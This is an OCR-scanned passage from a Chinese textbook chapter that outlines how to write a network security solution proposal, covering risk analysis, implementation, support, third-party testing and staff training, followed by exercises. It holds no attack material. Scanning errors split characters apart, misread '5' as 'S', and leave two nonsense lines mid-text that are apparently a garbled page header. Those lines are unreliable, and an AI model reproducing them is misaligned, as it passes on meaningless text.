产品 的 许可 证 是 一 份 必 不 可 缺 的 材料 ， 因 为 只 有 取得 许可 证 的 安全 产品 ， 才 允许 在 国 
内 销售 。 网 络 安全 属于 提供 服务 的 公司 ， 只 有 通过 国际 认证 才能 取得 用 户 更 大 的 信任 。 

5) 实施 网 络 安全 意义 

项 目 完成 后 ， 安 卓 公 司 的 系统 信息 安全 能 到 一 个 怎样 的 保护 水 平 ， 要 特别 结合 当前 的 
安全 风险 和 威胁 来 分 析 。 

2. 安全 风险 分 析 

安全 风险 分 析 主 要 是 对 网 络 物理 结构 、 网 络 系统 和 网 络 应 用 进行 安全 分 析 。 

1) 现 有 网 络 物理 结构 安全 分 析 

详细 分 析 公 司 与 各 分 公司 的 网 络 结构 ， 包 括 内 部 网 、 外 部 网 和 远程 网 。 

2) 网 络 系统 安全 分 析 

详细 分 析 公 司 与 各 分 公司 网 络 的 实际 连接 、Internet 的 访问 情况 、 桌 面 系统 的 使 用 情况 
和 主机 系统 的 使 用 情况 ， 找 出 可 能 存在 的 安全 风险 。 

3) 网 络 应 用 的 安全 分 析 

详细 分 析 公 司 与 各 分 公司 的 所 有 服务 系统 以 及 应 用 系统 ， 找 出 可 能 存在 的 安全 风险 。 

3.， 解决 方案 

解决 方案 包括 5 个 方面 。 

1) 建立 公司 系统 信息 安全 体系 结构 框架 

通过 具体 分 析 常 盛 信 息 集团 公司 的 具体 业务 和 网 络 、 系 统 、 应 用 等 实际 应 用 情况 ， 初 
步 建立 一 个 整体 的 安全 体系 结构 框架 。 

2) 技术 实施 策略 

技术 实施 策略 需要 从 网 络 结构 安全 、 主 机 安全 加 固 、 防 病毒 、 访 问 控制 、 传 输 加 密 、 
身份 认证 、 入 侵 检 测 技术 及 风险 评估 8 个 方面 进行 阐述 。 

3) 安全 管理 工具 

对 安全 项 目 中 所 用 到 的 安全 产品 进行 集中 、 统 一 、 安 全 的 管理 和 培训 。 

4) 紧急 响应 

制定 详细 的 紧急 响应 计划 ， 及 时 响应 用 户 的 网 络 、 系 统 和 应 用 可 能 会 遭 到 的 破坏 。 

5) 灾难 恢复 

制定 详细 的 灾难 恢复 计划 ， 及 时 地 把 用 户 遇 到 的 网 络 、 系 统 和 应 用 的 破坏 恢复 到 正常 
状态 ， 并 且 能 够 消除 产生 风险 和 威胁 的 根源 。 

4. 实施 方案 

实施 方案 包括 : 项 目 管理 以 及 项 目 质量 保证 。 


1) 项 目 管 理 

(1) 项 目 流程 : 详细 写 出 项 目的 实施 流程 ， 以 保证 项 目的 顺利 实施 。 

(2) 项 目 管理 制度 : 写 出 项 目的 管理 制度 ， 主 要 是 保证 项 目 实施 的 质量 ， 项 目 管理 主 
要 包括 人 的 管理 、 产 品 的 管理 和 技术 的 管理 。 

(3) 项 目 进度 : 项 目 实施 的 进度 表 ， 作 为 项 目 实施 的 时 间 标 准 ， 要 全 面 考虑 完成 项 目 
所 需要 的 物质 条 件 ， 计 划 出 一 个 比较 合适 的 时 间 进 度 表 。 

2) 项 目 质量 保证 

(1) 执行 人 员 的 质量 职责 : 规定 项 目 实施 相关 人 员 的 职责 ， 如 项 目 经 理 、 技 术 负责 人 、 
技术 工程 师 、 后 勤 人 员 等 ， 以 保证 整个 安全 项 目的 顺利 实施 。 

(2) 项 目 质量 的 保证 措施 : 严格 制定 出 保证 项 目 质量 的 措施 ， 主 要 的 内 容 涉 及 参与 项 
目的 相关 人 员 、 项 目 中 涉及 的 安全 产品 和 技术 、 用 户 派 出 支持 该 项 目的 相关 人 员 的 管理 。 

(3) 项 目 验收 : 根据 项 目的 具体 情况 ， 与 用 户 确定 项 目 验收 的 详细 事项 ， 包 括 安全 产 
品 、 技 术 、 完 成 情况 、 达 到 的 安全 目的 等 验收 。 

S， 技术 支持 和 服务 承诺 

包括 技术 支持 的 内 容 和 技术 支持 的 方式 。 

1) 技术 支持 的 内 容 

包括 安全 项 目 中 所 包括 的 产品 和 技术 的 服务 ， 提 供 的 技术 和 服务 包括 : 

(1) 安装 调试 项 目 中 所 涉及 的 全 部 产品 和 技术 。 

(2) 安全 产品 以 及 技术 文档 。 

(3) 提供 安全 产品 和 技术 的 最 新 信息 。 

(4) 服务 器 内 免费 产品 升级 。 

2) 技术 支持 方式 

安全 项 目 完 成 以 后 提供 的 技术 支持 服务 ， 内 容 包 括 以 下 内 容 。 

(1) 客户 现场 24 小 时 支持 服务 。 

(2) 客户 支持 中 心 热线 电话 。 

(3) 客户 支持 中 心 E-mail 服务 。 

(4) 客户 支持 中 心 Web 服务 。 

6. 产品 报价 

项 目 所 涉及 到 全 部 产品 和 服务 的 报价 。 

7. 产品 介绍 

公司 安全 项 目 中 所 有 涉及 到 的 产品 介绍 ， 主 要 是 使 用 户 清楚 所 选择 的 产品 是 什么 ， 不 
用 很 详细 ， 但 要 描述 清楚 。 

8. 第 三 方 检测 报告 
由 一 个 第 三 方 的 中 立 机 构 ， 对 实施 好 的 网 络 安全 构架 进行 安全 扫描 与 安全 检测 ， 并 提 
供 相关 的 检测 报告 。 

9. 安全 技术 培训 

1) 管理 人 员 的 安全 培训 
主要 针对 公司 非 技术 的 管理 人 员 的 培训 ， 提 高 他 们 对 安全 的 重视 程度 。 主 要 针对 4 个 
方面 的 内 容 进 行 培训 。 

(1) 网 络 系统 安全 在 企业 信息 系统 中 的 重要 性 。 


网 络 妆 会 方 美 雁 矿 


克 乡 委 会 兹 大 理论 与 笑 践 


(2) 安全 技术 能 够 带 来 的 好 处 。 

(3) 安全 管理 能 够 带 来 的 好 处 。 

(4) 安全 集成 和 网 络 系 统 集成 的 区 别 。 

2) 安全 技术 基础 培训 

主要 针对 网 络 系统 管理 员 、 安全 管理 相关 人 员 的 技术 培训 , 能 够 增强 他 们 的 安全 意识 ， 
了 解 基 本 的 安全 技术 ， 能 够 分 辨 出 网 络 、 系 统 和 应 用 中 可 能 存在 的 安全 问题 ， 并 且 能 够 采 
用 的 相关 的 安全 技术 、 产 品 或 服务 来 防范 。 培 训 的 内 容 包括 7 个 方面 。 

(1) 系统 安全 、 网 络 安 全 和 应 用 安全 的 概述 。 

(2) 系统 安全 的 风险 、 威 胁 和 漏洞 的 详细 分 析 。 

(3) 网 络 安全 的 风险 、 威 胁 和 漏洞 的 详细 分 析 。 

(4) 应 用 安全 的 风险 、 威 胁 和 漏洞 的 详细 分 析 。 

(5) 安全 防范 措施 的 技术 和 管理 。 

(6) 安全 产品 功能 的 简单 分 类 。 

(7) 黑客 攻击 技术 。 

3) 安全 攻防 技术 培训 

对 网 络 系统 管理 员 进 行 黑客 攻击 的 手段 、 原 理 和 方法 的 培训 ， 使 他 们 能 够 掌握 黑客 攻 
击 的 技术 ， 并 能 运用 到 实际 的 工作 中 ， 有 能 力 来 保护 网 络 、 系 统 和 应 用 的 安全 。 

4) Windows 系统 和 UNIX 系统 安全 管理 培训 

主要 针对 网 络 管理 员 和 系统 管理 员 的 系统 安全 技术 培训 ， 详 细 介 绍 操作 系统 的 安全 风 
险 、 安 全 威胁 和 安全 漏洞 等 ， 使 网 络 或 系统 管理 员 能 够 独立 配置 安全 系统 ， 独 立 维护 操作 
系统 的 安全 。 

5) 安全 产品 的 培训 

主要 针对 安全 项 目 中 的 所 用 到 的 安全 产品 向 有 关 人 员 提 供 培 训 ， 培 训 的 内 容 一 般 包 括 
以 下 三 个 方面 ， 可 以 根据 实际 情况 进行 删 减 。 

(1) 安全 产品 的 原理 ， 如 防火 墙 技术 、 入 侵 检测 技术 等 。 

(2) 各 种 安全 产品 在 安全 项 目 中 的 作用 、 重 要 性 和 局 限 性 。 

(3) 安全 产品 的 使 用 、 维 护 和 安全 。 


思考 与 练习 


.设计 网 络 安全 方案 需要 注意 哪些 问题 ? 

.如 何 评价 一 份 网 络 安全 方案 的 质量 ? 

. 网络 安 全 方案 框架 包含 哪些 内 容 ? 编写 时 需要 注意 什么 ? 

. 进行 社会 调查 ， 结 合 实际 编写 一 份 完整 的 网 络 安全 解决 方案 。 


一 
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